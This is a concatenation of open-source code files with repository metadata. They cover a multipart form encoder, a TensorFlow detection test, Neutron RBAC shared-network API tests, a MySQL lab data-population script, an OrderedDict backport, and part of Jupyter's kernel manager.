field is only useful to the server for determining the original filename.
``filetype`` if specified is the MIME type of this file.
The actual file data should be sent after this header has been sent.
"""
return MultipartParam(paramname, filesize=filesize, filename=filename,
filetype=filetype).encode_hdr(boundary)
def get_body_size(params, boundary):
"""Returns the number of bytes that the multipart/form-data encoding
of ``params`` will be."""
size = sum(p.get_size(boundary) for p in MultipartParam.from_params(params))
return size + len(boundary) + 6
def get_headers(params, boundary):
"""Returns a dictionary with Content-Type and Content-Length headers
for the multipart/form-data encoding of ``params``."""
headers = {}
boundary = urllib.quote_plus(boundary)
headers['Content-Type'] = "multipart/form-data; boundary=%s" % boundary
headers['Content-Length'] = get_body_size(params, boundary)
return headers
def multipart_encode(params, boundary=None):
"""Encode ``params`` as multipart/form-data.
``params`` should be a sequence of (name, value) pairs or MultipartParam
objects, or a mapping of names to values.
Values are either strings parameter values, or file-like objects to use as
the parameter value. The file-like objects must support .read() and either
.fileno() or both .seek() and .tell().
If ``boundary`` is set, then it as used as the MIME boundary. Otherwise
a randomly generated boundary will be used. In either case, if the
boundary string appears in the parameter values a ValueError will be
raised.
Returns a tuple of `datagen`, `headers`, where `datagen` is a
generator that will yield blocks of data that make up the encoded
parameters, and `headers` is a dictionary with the assoicated
Content-Type and Content-Length headers.
Examples:
>>> datagen, headers = multipart_encode( [("key", "value1"), ("key", "value2")] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> p = MultipartParam("key", "value2")
>>> datagen, headers = multipart_encode( [("key", "value1"), p] )
>>> s = "".join(datagen)
>>> assert "value2" in s and "value1" in s
>>> datagen, headers = multipart_encode( {"key": "value1"} )
>>> s = "".join(datagen)
>>> assert "value2" not in s and "value1" in s
"""
if boundary is None:
boundary = gen_boundary()
else:
boundary = urllib.quote_plus(boundary)
headers = get_headers(params, boundary)
params = MultipartParam.from_params(params)
def yielder():
"""generator function to yield multipart/form-data representation
of parameters"""
for param in params:
for block in param.iter_encode(boundary):
yield block
yield "--%s--\r\n" % boundary
return yielder(), headers
| bsd-3-clause |
alexgorban/models | research/object_detection/predictors/rfcn_box_predictor_test.py | 3 | 2917 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.predictors.rfcn_box_predictor."""
import numpy as np
import tensorflow as tf
from google.protobuf import text_format
from object_detection.builders import hyperparams_builder
from object_detection.predictors import rfcn_box_predictor as box_predictor
from object_detection.protos import hyperparams_pb2
from object_detection.utils import test_case
class RfcnBoxPredictorTest(test_case.TestCase):
def _build_arg_scope_with_conv_hyperparams(self):
conv_hyperparams = hyperparams_pb2.Hyperparams()
conv_hyperparams_text_proto = """
regularizer {
l2_regularizer {
}
}
initializer {
truncated_normal_initializer {
}
}
"""
text_format.Merge(conv_hyperparams_text_proto, conv_hyperparams)
return hyperparams_builder.build(conv_hyperparams, is_training=True)
def test_get_correct_box_encoding_and_class_prediction_shapes(self):
def graph_fn(image_features, proposal_boxes):
rfcn_box_predictor = box_predictor.RfcnBoxPredictor(
is_training=False,
num_classes=2,
conv_hyperparams_fn=self._build_arg_scope_with_conv_hyperparams(),
num_spatial_bins=[3, 3],
depth=4,
crop_size=[12, 12],
box_code_size=4
)
box_predictions = rfcn_box_predictor.predict(
[image_features], num_predictions_per_location=[1],
scope='BoxPredictor',
proposal_boxes=proposal_boxes)
box_encodings = tf.concat(
box_predictions[box_predictor.BOX_ENCODINGS], axis=1)
class_predictions_with_background = tf.concat(
box_predictions[box_predictor.CLASS_PREDICTIONS_WITH_BACKGROUND],
axis=1)
return (box_encodings, class_predictions_with_background)
image_features = np.random.rand(4, 8, 8, 64).astype(np.float32)
proposal_boxes = np.random.rand(4, 2, 4).astype(np.float32)
(box_encodings, class_predictions_with_background) = self.execute(
graph_fn, [image_features, proposal_boxes])
self.assertAllEqual(box_encodings.shape, [8, 1, 2, 4])
self.assertAllEqual(class_predictions_with_background.shape, [8, 1, 3])
if __name__ == '__main__':
tf.test.main()
| apache-2.0 |
dims/neutron | neutron/tests/api/admin/test_shared_network_extension.py | 1 | 19631 | # Copyright 2015 Hewlett-Packard Development Company, L.P.dsvsv
# Copyright 2015 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from tempest import test
from tempest_lib.common.utils import data_utils
from tempest_lib import exceptions as lib_exc
import testtools
from neutron.tests.api import base
class SharedNetworksTest(base.BaseAdminNetworkTest):
@classmethod
def resource_setup(cls):
super(SharedNetworksTest, cls).resource_setup()
cls.shared_network = cls.create_shared_network()
@test.idempotent_id('6661d219-b96d-4597-ad10-55766123421a')
def test_filtering_shared_networks(self):
# this test is necessary because the 'shared' column does not actually
# exist on networks so the filter function has to translate it into
# queries against the RBAC table
self.create_network()
self._check_shared_correct(
self.client.list_networks(shared=True)['networks'], True)
self._check_shared_correct(
self.admin_client.list_networks(shared=True)['networks'], True)
self._check_shared_correct(
self.client.list_networks(shared=False)['networks'], False)
self._check_shared_correct(
self.admin_client.list_networks(shared=False)['networks'], False)
def _check_shared_correct(self, items, shared):
self.assertNotEmpty(items)
self.assertTrue(all(n['shared'] == shared for n in items))
@test.idempotent_id('6661d219-b96d-4597-ad10-51672353421a')
def test_filtering_shared_subnets(self):
# shared subnets need to be tested because their shared status isn't
# visible as a regular API attribute and it's solely dependent on the
# parent network
reg = self.create_network()
priv = self.create_subnet(reg, client=self.client)
shared = self.create_subnet(self.shared_network,
client=self.admin_client)
self.assertIn(shared, self.client.list_subnets(shared=True)['subnets'])
self.assertIn(shared,
self.admin_client.list_subnets(shared=True)['subnets'])
self.assertNotIn(priv,
self.client.list_subnets(shared=True)['subnets'])
self.assertNotIn(priv,
self.admin_client.list_subnets(shared=True)['subnets'])
self.assertIn(priv, self.client.list_subnets(shared=False)['subnets'])
self.assertIn(priv,
self.admin_client.list_subnets(shared=False)['subnets'])
self.assertNotIn(shared,
self.client.list_subnets(shared=False)['subnets'])
self.assertNotIn(shared,
self.admin_client.list_subnets(shared=False)['subnets'])
@test.idempotent_id('6661d219-b96d-4597-ad10-55766ce4abf7')
def test_create_update_shared_network(self):
shared_network = self.create_shared_network()
net_id = shared_network['id']
self.assertEqual('ACTIVE', shared_network['status'])
self.assertIsNotNone(shared_network['id'])
self.assertTrue(self.shared_network['shared'])
new_name = "New_shared_network"
body = self.admin_client.update_network(net_id, name=new_name,
admin_state_up=False,
shared=False)
updated_net = body['network']
self.assertEqual(new_name, updated_net['name'])
self.assertFalse(updated_net['shared'])
self.assertFalse(updated_net['admin_state_up'])
@test.idempotent_id('9c31fabb-0181-464f-9ace-95144fe9ca77')
def test_create_port_shared_network_as_non_admin_tenant(self):
# create a port as non admin
body = self.client.create_port(network_id=self.shared_network['id'])
port = body['port']
self.addCleanup(self.admin_client.delete_port, port['id'])
# verify the tenant id of admin network and non admin port
self.assertNotEqual(self.shared_network['tenant_id'],
port['tenant_id'])
@test.idempotent_id('3e39c4a6-9caf-4710-88f1-d20073c6dd76')
def test_create_bulk_shared_network(self):
# Creates 2 networks in one request
net_nm = [data_utils.rand_name('network'),
data_utils.rand_name('network')]
body = self.admin_client.create_bulk_network(net_nm, shared=True)
created_networks = body['networks']
for net in created_networks:
self.addCleanup(self.admin_client.delete_network, net['id'])
self.assertIsNotNone(net['id'])
self.assertTrue(net['shared'])
def _list_shared_networks(self, user):
body = user.list_networks(shared=True)
networks_list = [net['id'] for net in body['networks']]
self.assertIn(self.shared_network['id'], networks_list)
self.assertTrue(self.shared_network['shared'])
@test.idempotent_id('a064a9fd-e02f-474a-8159-f828cd636a28')
def test_list_shared_networks(self):
# List the shared networks and confirm that
# shared network extension attribute is returned for those networks
# that are created as shared
self._list_shared_networks(self.admin_client)
self._list_shared_networks(self.client)
def _show_shared_network(self, user):
body = user.show_network(self.shared_network['id'])
show_shared_net = body['network']
self.assertEqual(self.shared_network['name'], show_shared_net['name'])
self.assertEqual(self.shared_network['id'], show_shared_net['id'])
self.assertTrue(show_shared_net['shared'])
@test.idempotent_id('e03c92a2-638d-4bfa-b50a-b1f66f087e58')
def test_show_shared_networks_attribute(self):
# Show a shared network and confirm that
# shared network extension attribute is returned.
self._show_shared_network(self.admin_client)
self._show_shared_network(self.client)
class AllowedAddressPairSharedNetworkTest(base.BaseAdminNetworkTest):
allowed_address_pairs = [{'ip_address': '1.1.1.1'}]
@classmethod
def skip_checks(cls):
super(AllowedAddressPairSharedNetworkTest, cls).skip_checks()
if not test.is_extension_enabled('allowed-address-pairs', 'network'):
msg = "Allowed Address Pairs extension not enabled."
raise cls.skipException(msg)
@classmethod
def resource_setup(cls):
super(AllowedAddressPairSharedNetworkTest, cls).resource_setup()
cls.network = cls.create_shared_network()
cls.create_subnet(cls.network, client=cls.admin_client)
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-ffffffff1fff')
def test_create_with_address_pair_blocked_on_other_network(self):
with testtools.ExpectedException(lib_exc.Forbidden):
self.create_port(self.network,
allowed_address_pairs=self.allowed_address_pairs)
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-ffffffff2fff')
def test_update_with_address_pair_blocked_on_other_network(self):
port = self.create_port(self.network)
with testtools.ExpectedException(lib_exc.Forbidden):
self.update_port(
port, allowed_address_pairs=self.allowed_address_pairs)
class RBACSharedNetworksTest(base.BaseAdminNetworkTest):
force_tenant_isolation = True
credentials = ['primary', 'alt', 'admin']
@classmethod
def resource_setup(cls):
super(RBACSharedNetworksTest, cls).resource_setup()
if not test.is_extension_enabled('rbac_policies', 'network'):
msg = "rbac extension not enabled."
raise cls.skipException(msg)
cls.client2 = cls.alt_manager.network_client
def _make_admin_net_and_subnet_shared_to_tenant_id(self, tenant_id):
net = self.admin_client.create_network(
name=data_utils.rand_name('test-network-'))['network']
self.addCleanup(self.admin_client.delete_network, net['id'])
subnet = self.create_subnet(net, client=self.admin_client)
# network is shared to first unprivileged client by default
pol = self.admin_client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=tenant_id
)['rbac_policy']
return {'network': net, 'subnet': subnet, 'policy': pol}
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff1fff')
def test_network_only_visible_to_policy_target(self):
net = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['network']
self.client.show_network(net['id'])
with testtools.ExpectedException(lib_exc.NotFound):
# client2 has not been granted access
self.client2.show_network(net['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff2fff')
def test_subnet_on_network_only_visible_to_policy_target(self):
sub = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['subnet']
self.client.show_subnet(sub['id'])
with testtools.ExpectedException(lib_exc.NotFound):
# client2 has not been granted access
self.client2.show_subnet(sub['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff2eee')
def test_policy_target_update(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
# change to client2
update_res = self.admin_client.update_rbac_policy(
res['policy']['id'], target_tenant=self.client2.tenant_id)
self.assertEqual(self.client2.tenant_id,
update_res['rbac_policy']['target_tenant'])
# make sure everything else stayed the same
res['policy'].pop('target_tenant')
update_res['rbac_policy'].pop('target_tenant')
self.assertEqual(res['policy'], update_res['rbac_policy'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff3fff')
def test_port_presence_prevents_network_rbac_policy_deletion(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
port = self.client.create_port(network_id=res['network']['id'])['port']
# a port on the network should prevent the deletion of a policy
# required for it to exist
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.delete_rbac_policy(res['policy']['id'])
# a wildcard policy should allow the specific policy to be deleted
# since it allows the remaining port
wild = self.admin_client.create_rbac_policy(
object_type='network', object_id=res['network']['id'],
action='access_as_shared', target_tenant='*')['rbac_policy']
self.admin_client.delete_rbac_policy(res['policy']['id'])
# now that wildcard is the only remaining, it should be subjected to
# to the same restriction
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.delete_rbac_policy(wild['id'])
# similarly, we can't update the policy to a different tenant
with testtools.ExpectedException(lib_exc.Conflict):
self.admin_client.update_rbac_policy(
wild['id'], target_tenant=self.client2.tenant_id)
self.client.delete_port(port['id'])
# anchor is gone, delete should pass
self.admin_client.delete_rbac_policy(wild['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-beefbeefbeef')
def test_tenant_can_delete_port_on_own_network(self):
# TODO(kevinbenton): make adjustments to the db lookup to
# make this work.
msg = "Non-admin cannot currently delete other's ports."
raise self.skipException(msg)
# pylint: disable=unreachable
net = self.create_network() # owned by self.client
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
port = self.client2.create_port(network_id=net['id'])['port']
self.client.delete_port(port['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff4fff')
def test_regular_client_shares_to_another_regular_client(self):
net = self.create_network() # owned by self.client
with testtools.ExpectedException(lib_exc.NotFound):
self.client2.show_network(net['id'])
pol = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
self.client2.show_network(net['id'])
self.assertIn(pol['rbac_policy'],
self.client.list_rbac_policies()['rbac_policies'])
# ensure that 'client2' can't see the policy sharing the network to it
# because the policy belongs to 'client'
self.assertNotIn(pol['rbac_policy']['id'],
[p['id']
for p in self.client2.list_rbac_policies()['rbac_policies']])
@test.attr(type='smoke')
@test.idempotent_id('bf5052b8-b11e-407c-8e43-113447404d3e')
def test_filter_fields(self):
net = self.create_network()
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
field_args = (('id',), ('id', 'action'), ('object_type', 'object_id'),
('tenant_id', 'target_tenant'))
for fields in field_args:
res = self.client.list_rbac_policies(fields=fields)
self.assertEqual(set(fields), set(res['rbac_policies'][0].keys()))
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff5fff')
def test_policy_show(self):
res = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
p1 = res['policy']
p2 = self.admin_client.create_rbac_policy(
object_type='network', object_id=res['network']['id'],
action='access_as_shared',
target_tenant='*')['rbac_policy']
self.assertEqual(
p1, self.admin_client.show_rbac_policy(p1['id'])['rbac_policy'])
self.assertEqual(
p2, self.admin_client.show_rbac_policy(p2['id'])['rbac_policy'])
@test.attr(type='smoke')
@test.idempotent_id('e7bcb1ea-4877-4266-87bb-76f68b421f31')
def test_filter_policies(self):
net = self.create_network()
pol1 = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=self.client2.tenant_id)['rbac_policy']
pol2 = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=self.client.tenant_id)['rbac_policy']
res1 = self.client.list_rbac_policies(id=pol1['id'])['rbac_policies']
res2 = self.client.list_rbac_policies(id=pol2['id'])['rbac_policies']
self.assertEqual(1, len(res1))
self.assertEqual(1, len(res2))
self.assertEqual(pol1['id'], res1[0]['id'])
self.assertEqual(pol2['id'], res2[0]['id'])
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff6fff')
def test_regular_client_blocked_from_sharing_anothers_network(self):
net = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)['network']
with testtools.ExpectedException(lib_exc.BadRequest):
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client.tenant_id)
@test.attr(type='smoke')
@test.idempotent_id('c5f8f785-ce8d-4430-af7e-a236205862fb')
def test_rbac_policy_quota(self):
if not test.is_extension_enabled('quotas', 'network'):
msg = "quotas extension not enabled."
raise self.skipException(msg)
quota = self.client.show_quotas(self.client.tenant_id)['quota']
max_policies = quota['rbac_policy']
self.assertGreater(max_policies, 0)
net = self.client.create_network(
name=data_utils.rand_name('test-network-'))['network']
self.addCleanup(self.client.delete_network, net['id'])
with testtools.ExpectedException(lib_exc.Conflict):
for i in range(0, max_policies + 1):
self.admin_client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared',
target_tenant=str(uuid.uuid4()).replace('-', ''))
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-afffffff7fff')
def test_regular_client_blocked_from_sharing_with_wildcard(self):
net = self.create_network()
with testtools.ExpectedException(lib_exc.Forbidden):
self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant='*')
# ensure it works on update as well
pol = self.client.create_rbac_policy(
object_type='network', object_id=net['id'],
action='access_as_shared', target_tenant=self.client2.tenant_id)
with testtools.ExpectedException(lib_exc.Forbidden):
self.client.update_rbac_policy(pol['rbac_policy']['id'],
target_tenant='*')
@test.attr(type='smoke')
@test.idempotent_id('86c3529b-1231-40de-803c-aeeeeeee7fff')
def test_filtering_works_with_rbac_records_present(self):
resp = self._make_admin_net_and_subnet_shared_to_tenant_id(
self.client.tenant_id)
net = resp['network']['id']
sub = resp['subnet']['id']
self.admin_client.create_rbac_policy(
object_type='network', object_id=net,
action='access_as_shared', target_tenant='*')
self._assert_shared_object_id_listing_presence('subnets', False, sub)
self._assert_shared_object_id_listing_presence('subnets', True, sub)
self._assert_shared_object_id_listing_presence('networks', False, net)
self._assert_shared_object_id_listing_presence('networks', True, net)
def _assert_shared_object_id_listing_presence(self, resource, shared, oid):
lister = getattr(self.admin_client, 'list_%s' % resource)
objects = [o['id'] for o in lister(shared=shared)[resource]]
if shared:
self.assertIn(oid, objects)
else:
self.assertNotIn(oid, objects)
| apache-2.0 |
piotrgiedziun/university | advanced_databases/lab2/populate.py | 1 | 2042 | #!/usr/bin/python
import MySQLdb
import random
from datetime import datetime as dt, timedelta
# MySQL format
DATE_FORMAT = '%Y-%m-%d %H:%M:%S'
db = MySQLdb.connect(host="localhost", user="root", passwd="", db="sakila")
cur = db.cursor()
print "connected"
# truncate old data
cur.execute("SET FOREIGN_KEY_CHECKS = 0;");
cur.execute("TRUNCATE `ticket`;");
cur.execute("TRUNCATE `seat`;");
cur.execute("TRUNCATE `show`;");
cur.execute("TRUNCATE `cinema`;");
cur.execute("TRUNCATE `theater`;");
cur.execute("SET FOREIGN_KEY_CHECKS = 1;");
print "cleaned"
# create cinema
cur.execute("INSERT INTO `cinema` (name, address) VALUES ('cinema', 'wroclaw');")
seat_id = 0
for theater_id in range(1, 1001):
#is_3D = random.randint(0,1)
is_3D = 1
query = "INSERT INTO `theater` (theater_id, name, is_3D, cinema_cinema_id) VALUES ('%d', 'theater%d', '%d', '1');" % (theater_id, theater_id, is_3D,)
#print query
cur.execute(query)
theater_real_id = db.insert_id()
# create seats for theater
for seat_col in range(0, 10):
for seat_row in range(0, 10):
price = random.randint(18,25)
query = "INSERT INTO `seat` (row, col, price, theater_theater_id) VALUES (%d, %d, %d, %d);" % (seat_row, seat_col, price, theater_real_id)
#print ">", query
cur.execute(query)
# create shows
now = dt.now() + timedelta(days=1)
for show_id in range(0, 1):
film_id = random.randint(1,999)
now += timedelta(minutes=185);
query = "INSERT INTO `show` (start_date, theater_theater_id, film_film_id) VALUES ('%s', %d, %d);" % (now.strftime(DATE_FORMAT), theater_real_id, film_id)
#print ">", query
cur.execute(query)
show_real_id = db.insert_id()
# craete ticket
for seat_col in range(0, 10):
for seat_row in range(0, 10):
price = random.randint(18,25)
# get seat_id
seat_id += 1
query = "INSERT INTO `ticket` (price, seat_seat_id, show_show_id, cinema_cinema_id, theater_id) VALUES (%d, %d, %d, 1, %d);" % (price, seat_id, show_real_id, theater_real_id)
#print ">", query
cur.execute(query)
db.commit() | mit |
cdepman/falcon_api | site-packages/pip/compat/ordereddict.py | 141 | 4110 | # Copyright (c) 2009 Raymond Hettinger
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# flake8: noqa
from UserDict import DictMixin
class OrderedDict(dict, DictMixin):
def __init__(self, *args, **kwds):
if len(args) > 1:
raise TypeError('expected at most 1 arguments, got %d' % len(args))
try:
self.__end
except AttributeError:
self.clear()
self.update(*args, **kwds)
def clear(self):
self.__end = end = []
end += [None, end, end] # sentinel node for doubly linked list
self.__map = {} # key --> [key, prev, next]
dict.clear(self)
def __setitem__(self, key, value):
if key not in self:
end = self.__end
curr = end[1]
curr[2] = end[1] = self.__map[key] = [key, curr, end]
dict.__setitem__(self, key, value)
def __delitem__(self, key):
dict.__delitem__(self, key)
key, prev, next = self.__map.pop(key)
prev[2] = next
next[1] = prev
def __iter__(self):
end = self.__end
curr = end[2]
while curr is not end:
yield curr[0]
curr = curr[2]
def __reversed__(self):
end = self.__end
curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
if len(self) != len(other):
return False
for p, q in zip(self.items(), other.items()):
if p != q:
return False
return True
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
| mit |
lancezlin/ml_template_py | lib/python2.7/site-packages/jupyter_client/manager.py | 6 | 15569 | """Base class to manage a running kernel"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import absolute_import
from contextlib import contextmanager
import os
import re
import signal
import sys
import time
import warnings
try:
from queue import Empty # Py 3
except ImportError:
from Queue import Empty # Py 2
import zmq
from ipython_genutils.importstring import import_item
from .localinterfaces import is_local_ip, local_ips
from traitlets import (
Any, Instance, Unicode, List, Bool, Type, DottedObjectName
)
from jupyter_client import (
launch_kernel,
kernelspec,
)
from .connect import ConnectionFileMixin
from .session import Session
from .managerabc import (
KernelManagerABC
)
class KernelManager(ConnectionFileMixin):
"""Manages a single kernel in a subprocess on this host.
This version starts kernels with Popen.
"""
# The PyZMQ Context to use for communication with the kernel.
context = Instance(zmq.Context)
def _context_default(self):
return zmq.Context.instance()
# the class to create with our `client` method
client_class = DottedObjectName('jupyter_client.blocking.BlockingKernelClient')
client_factory = Type(klass='jupyter_client.KernelClient')
def _client_factory_default(self):
return import_item(self.client_class)
def _client_class_changed(self, name, old, new):
self.client_factory = import_item(str(new))
# The kernel process with which the KernelManager is communicating.
# generally a Popen instance
kernel = Any()
kernel_spec_manager = Instance(kernelspec.KernelSpecManager)
def _kernel_spec_manager_default(self):
return kernelspec.KernelSpecManager(data_dir=self.data_dir)
def _kernel_spec_manager_changed(self):
self._kernel_spec = None
kernel_name = Unicode(kernelspec.NATIVE_KERNEL_NAME)
def _kernel_name_changed(self, name, old, new):
self._kernel_spec = None
if new == 'python':
self.kernel_name = kernelspec.NATIVE_KERNEL_NAME
_kernel_spec = None
@property
def kernel_spec(self):
if self._kernel_spec is None:
self._kernel_spec = self.kernel_spec_manager.get_kernel_spec(self.kernel_name)
return self._kernel_spec
kernel_cmd = List(Unicode(), config=True,
help="""DEPRECATED: Use kernel_name instead.
The Popen Command to launch the kernel.
Override this if you have a custom kernel.
If kernel_cmd is specified in a configuration file,
Jupyter does not pass any arguments to the kernel,
because it cannot make any assumptions about the
arguments that the kernel understands. In particular,
this means that the kernel does not receive the
option --debug if it given on the Jupyter command line.
"""
)
def _kernel_cmd_changed(self, name, old, new):
warnings.warn("Setting kernel_cmd is deprecated, use kernel_spec to "
"start different kernels.")
@property
def ipykernel(self):
return self.kernel_name in {'python', 'python2', 'python3'}
# Protected traits
_launch_args = Any()
_control_socket = Any()
_restarter = Any()
autorestart = Bool(True, config=True,
help="""Should we autorestart the kernel if it dies."""
)
def __del__(self):
self._close_control_socket()
self.cleanup_connection_file()
#--------------------------------------------------------------------------
# Kernel restarter
#--------------------------------------------------------------------------
def start_restarter(self):
pass
def stop_restarter(self):
pass
def add_restart_callback(self, callback, event='restart'):
"""register a callback to be called when a kernel is restarted"""
if self._restarter is None:
return
self._restarter.add_callback(callback, event)
def remove_restart_callback(self, callback, event='restart'):
"""unregister a callback to be called when a kernel is restarted"""
if self._restarter is None:
return
self._restarter.remove_callback(callback, event)
#--------------------------------------------------------------------------
# create a Client connected to our Kernel
#--------------------------------------------------------------------------
def client(self, **kwargs):
"""Create a client configured to connect to our kernel"""
kw = {}
kw.update(self.get_connection_info(session=True))
kw.update(dict(
connection_file=self.connection_file,
parent=self,
))
# add kwargs last, for manual overrides
kw.update(kwargs)
return self.client_factory(**kw)
#--------------------------------------------------------------------------
# Kernel management
#--------------------------------------------------------------------------
def format_kernel_cmd(self, extra_arguments=None):
"""replace templated args (e.g. {connection_file})"""
extra_arguments = extra_arguments or []
if self.kernel_cmd:
cmd = self.kernel_cmd + extra_arguments
else:
cmd = self.kernel_spec.argv + extra_arguments
ns = dict(connection_file=self.connection_file,
prefix=sys.prefix,
)
ns.update(self._launch_args)
pat = re.compile(r'\{([A-Za-z0-9_]+)\}')
def from_ns(match):
"""Get the key out of ns if it's there, otherwise no change."""
return ns.get(match.group(1), match.group())
return [ pat.sub(from_ns, arg) for arg in cmd ]
def _launch_kernel(self, kernel_cmd, **kw):
"""actually launch the kernel
override in a subclass to launch kernel subprocesses differently
"""
return launch_kernel(kernel_cmd, **kw)
# Control socket used for polite kernel shutdown
def _connect_control_socket(self):
if self._control_socket is None:
self._control_socket = self.connect_control()
self._control_socket.linger = 100
def _close_control_socket(self):
if self._control_socket is None:
return
self._control_socket.close()
self._control_socket = None
def start_kernel(self, **kw):
"""Starts a kernel on this host in a separate process.
If random ports (port=0) are being used, this method must be called
before the channels are created.
Parameters
----------
`**kw` : optional
keyword arguments that are passed down to build the kernel_cmd
and launching the kernel (e.g. Popen kwargs).
"""
if self.transport == 'tcp' and not is_local_ip(self.ip):
raise RuntimeError("Can only launch a kernel on a local interface. "
"Make sure that the '*_address' attributes are "
"configured properly. "
"Currently valid addresses are: %s" % local_ips()
)
# write connection file / get default ports
self.write_connection_file()
# save kwargs for use in restart
self._launch_args = kw.copy()
# build the Popen cmd
extra_arguments = kw.pop('extra_arguments', [])
kernel_cmd = self.format_kernel_cmd(extra_arguments=extra_arguments)
env = kw.pop('env', os.environ).copy()
# Don't allow PYTHONEXECUTABLE to be passed to kernel process.
# If set, it can bork all the things.
env.pop('PYTHONEXECUTABLE', None)
if not self.kernel_cmd:
# If kernel_cmd has been set manually, don't refer to a kernel spec
# Environment variables from kernel spec are added to os.environ
env.update(self.kernel_spec.env or {})
# launch the kernel subprocess
self.log.debug("Starting kernel: %s", kernel_cmd)
self.kernel = self._launch_kernel(kernel_cmd, env=env,
**kw)
self.start_restarter()
self._connect_control_socket()
def request_shutdown(self, restart=False):
"""Send a shutdown request via control channel
"""
content = dict(restart=restart)
msg = self.session.msg("shutdown_request", content=content)
self.session.send(self._control_socket, msg)
def finish_shutdown(self, waittime=1, pollinterval=0.1):
"""Wait for kernel shutdown, then kill process if it doesn't shutdown.
This does not send shutdown requests - use :meth:`request_shutdown`
first.
"""
for i in range(int(waittime/pollinterval)):
if self.is_alive():
time.sleep(pollinterval)
else:
break
else:
# OK, we've waited long enough.
if self.has_kernel:
self._kill_kernel()
def cleanup(self, connection_file=True):
